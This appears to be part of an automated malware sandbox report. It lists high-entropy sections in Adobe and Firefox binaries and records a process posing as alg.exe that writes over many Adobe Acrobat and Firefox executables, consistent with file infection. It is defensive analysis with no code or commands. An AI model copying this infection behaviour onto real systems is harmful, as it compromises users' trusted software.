                  Source: AdobeCollabSync.exe.3.dr  Static PE information: section name: .reloc entropy: 7.905865604895901
                  Source: CRLogTransport.exe.3.dr  Static PE information: section name: .reloc entropy: 7.938136521584719
                  Source: LogTransport2.exe.3.dr  Static PE information: section name: .reloc entropy: 7.9355775626581595
                  Source: adobe_licensing_wf_acro.exe.3.dr  Static PE information: section name: .reloc entropy: 7.942434242016713
                  Source: Acrobat.exe0.3.dr  Static PE information: section name: .reloc entropy: 7.857651811197106
                  Source: setup.exe0.3.dr  Static PE information: section name: .rsrc entropy: 7.644716681434792
                  Source: appvcleaner.exe.3.dr  Static PE information: section name: .reloc entropy: 7.935640193882772

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\alg.exe  File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\31d53b0537b9f482.bin
                  Source: C:\Users\user\AppData\Local\Temp\x.exe  File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\System32\alg.exe  File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
